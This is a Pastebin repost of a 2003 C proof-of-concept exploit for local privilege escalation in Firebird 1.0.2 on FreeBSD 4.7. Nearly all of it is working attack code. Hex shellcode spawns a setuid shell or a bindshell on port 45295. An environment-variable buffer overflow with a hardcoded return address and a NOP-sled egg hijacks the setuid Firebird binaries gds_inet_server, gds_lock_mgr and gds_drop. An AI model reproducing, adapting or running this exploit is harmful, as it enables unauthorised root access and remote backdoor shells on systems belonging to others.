Advertisement
FlyFar

Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation - CVE-2003-0281/2002-2087

Jan 24th, 2024
543
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.24 KB | Cybersecurity | 0 0
  1. /* DSR-firebird.c
  2.    -------------------------------
  3. Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
  4. This is Proof Of concept code.
  5. bash-2.05a$ ./DSR-firebird
  6. ( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
  7. ( (                           by - bob@dtors.net ) )
  8. ----------------------------------------------------
  9.  
  10. Usage: ./DSR-firebird <target#>
  11. Targets:
  12. 1. [0xbfbff75d] - gds_inet_server
  13. 2. [0xbfbff75c] - gds_lock_mgr
  14. 3. [0xbfbff75e] - gds_drop
  15.  
  16. bash-2.05a$
  17. */
  18.  
  19.  
  20. #include <stdio.h>
  21. #include <stdlib.h>
  22. #include <string.h>
  23. #define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
  24. #define DROP    "/usr/local/firebird/bin/gds_drop"
  25. #define INET    "/usr/local/firebird/bin/gds_inet_server"
  26. #define LEN     1056
  27.  
  28. char dropcode[]=
  29.         "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
  30.         "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  31.       "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
  32.       "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
  33.  
  34. char inetcode[]=
  35.         "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
  36.         "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  37.       "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
  38.       "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
  39.  
  40.                            
  41.  
  42. char lockcode[]=
  43.     "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
  44.     "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
  45.     "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" //setuid[firebird] by
  46. bob
  47.     "\x31\xc0\x31\xdb\x53\xb3\x06\x53" //fork() bindshell by eSDee
  48.     "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
  49.     "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
  50.     "\x50\x50\x66\x68\xb0\xef\xb7\x02"
  51.       "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
  52.       "\x53\x51\x57\x50\xb0\x68\xcd\x80"
  53.       "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
  54.       "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
  55.       "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
  56.       "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
  57.       "\xe2\x50\x51\x52\xb3\x14\x53\x50"
  58.       "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
  59.       "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
  60.       "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
  61.       "\x39\xc3\x75\x44\x31\xc0\x57\x50"
  62.       "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
  63.       "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
  64.       "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
  65.       "\x80\x31\xc0\x43\x53\x56\x50\xb0"
  66.       "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
  67.       "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
  68.       "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
  69.       "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
  70.       "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
  71.       "\xeb\x9a";
  72.  
  73. char *decide(char *string)
  74. {
  75.     if(!(strcmp(string, "1")))
  76.       return((char *)&inetcode);
  77.     if(!(strcmp(string, "2")))
  78.       return((char *)&lockcode);
  79.     if(!(strcmp(string, "3")))
  80.       return((char *)&dropcode);
  81.     exit(0);
  82. }
  83.  
  84. int main(int argc, char **argv)
  85. {
  86.    
  87.     unsigned long ret = 0xbfbff743;
  88.      
  89.     char *selectcode;
  90.     char buffer[LEN];
  91.     char egg[1024];
  92.     char *ptr;
  93.     int i=0;
  94.  
  95.  
  96.  
  97.     if(argc < 2)
  98.     {
  99.         printf("( ( Firebird-1.0.2 Local exploit for Freebsd
  100. 4.7 ) )\n");
  101.         printf("( (                           by -
  102. bob@dtors.net ) )\n");
  103.         printf("---------------------------------------------------
  104. -\n\n");
  105.         printf("Usage: %s <target#> \n", argv[0]);
  106.         printf("Targets:\n");
  107.         printf("1. [0xbfbff743] - gds_inet_server\n");
  108.         printf("2. [0xbfbff743] - gds_lock_mgr\n");
  109.         printf("3. [0xbfbff743] - gds_drop\n");
  110.         printf("\nwww.dtors.net\n");
  111.         exit(0);
  112.     }
  113.  
  114.     selectcode = (char *)decide(argv[1]);
  115.     memset(buffer, 0x41, sizeof(buffer));
  116.  
  117.         ptr = egg;
  118.  
  119.         for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
  120.         for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
  121.         egg[1024 - 1] = '\0';
  122.  
  123.         memcpy(egg,"EGG=",4);
  124.         putenv(egg);
  125.  
  126.         memcpy(&buffer[1052],(char *)&ret,4);
  127.         buffer[1056] = 0;
  128.  
  129.         setenv("INTERBASE", buffer, 1);
  130.  
  131.         fprintf(stdout, "Return Address: 0x%x\n", ret);
  132.         fprintf(stdout, "Buffer Size: %d\n", LEN);
  133.         fprintf(stdout, "Setuid [90]\n");
  134.  
  135. if(selectcode == (char *)&inetcode)
  136.   {
  137.     execl(INET, INET, NULL);
  138.     return 0;
  139.    }
  140.  
  141. if(selectcode == (char *)&lockcode)
  142.   {
  143.     printf("\nShell is on port 45295\nExploit will hang!\n");
  144.     execl(LOCK, LOCK, NULL);
  145.     return 0;
  146.    }
  147.  
  148. if(selectcode == (char *)&dropcode)
  149.   {
  150.     execl(DROP, DROP, NULL);
  151.     return 0;
  152.    }
  153.  
  154.    
  155.     return 0;
  156. }
  157.  
  158.  
  159. // milw0rm.com [2003-05-12]
  160.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement